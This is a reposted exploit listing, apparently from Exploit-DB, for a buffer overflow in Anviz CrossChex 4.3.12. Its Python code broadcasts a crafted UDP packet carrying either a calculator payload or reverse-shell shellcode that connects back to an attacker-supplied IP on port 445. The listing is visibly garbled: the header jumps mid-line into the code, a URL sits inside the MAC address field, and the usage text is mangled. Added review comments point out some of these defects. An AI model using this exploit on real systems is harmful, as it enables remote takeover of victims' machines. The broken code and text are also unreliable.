
Published on December 2nd, 2019 📆 | 5844 Views ⚑


Anviz CrossChex 4.3.12 – Local Buffer Overflow



# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86  2:
      request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
    else:
      request = request + calculator_payload

    scapy.all.sendp( Ether(src="http://www.exploit-db.com/00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request),  iface=sys.argv[1] )

def setFuzzUDPServer(ip='', port=5050, timeout=150):
    """Listen on a UDP port and answer each received datagram via sendFuzzingUDPBroadcast.

    The socket is bound to all interfaces on ``port``; ``ip`` is not used for
    the bind and is only forwarded to ``sendFuzzingUDPBroadcast`` (defined
    elsewhere in this file). ``timeout`` is used twice: as the per-call socket
    timeout and as the overall lifetime of the listen loop, in seconds.

    Returns the list of ``recvfrom`` results (payload, sender address) that
    were captured as the first datagram of each loop iteration.

    Review notes for readers analysing this listing:
    - No check is made on the sender or the content of a datagram before the
      broadcast routine is invoked; any UDP packet reaching the port does it.
    - Presumably the default port 5050 is where the CrossChex client's own
      discovery traffic arrives (the status message below suggests so); an
      unexpected listener on that port is a reasonable thing to alert on.
    """
    # Bare except is kept as in the original: a failure here only prints, so
    # the name below stays unbound and the bind step is what actually exits.
    try:
        listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except:
        print('[!] Failed to create server socket')

    try:
        listener.bind(('', port))
    except:
        print('[*] Server socket bind failed')
        sys.exit()

    print('[*] Waiting for crosschex')
    listener.settimeout(timeout)
    deadline = time.time() + timeout
    captured = []

    while time.time() <= deadline:
        try:
            datagram = listener.recvfrom(1024)
            print(datagram)
            captured.append(datagram)
            sendFuzzingUDPBroadcast(ip=ip)
            # A second datagram is read and dropped; it is never recorded.
            listener.recvfrom(1024)
        except socket.timeout:
            # A receive timeout is reported but does not end the loop; only
            # the deadline check above does.
            print("[!] Error with UDP server")

    listener.close()
    return captured

# Script entry: these statements run at module level, not inside a function.
# nargs is a module-level name; presumably the truncated function above reads
# it as well, so it is left as-is -- TODO confirm against the full listing.
nargs = len(sys.argv)

# Exit with the usage text when no command-line argument was given.
# NOTE(review): the usage string contains a literal %s that is never
# interpolated, and "[]ntif" looks like argument placeholders and escape
# sequences lost when the page was extracted -- compare with the original
# listing before relying on it. The visible code above uses sys.argv[1] as the
# network interface name and sys.argv[2] as an IP address.
if nargs < 2:
  print("[*] Usage: python3 %s  []ntif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
  sys.exit(0)

# Starts the listener with its defaults (ip='', port=5050, timeout=150); the
# list it returns is discarded.
setFuzzUDPServer()
            





https://www.exploit-db.com/exploits/47734
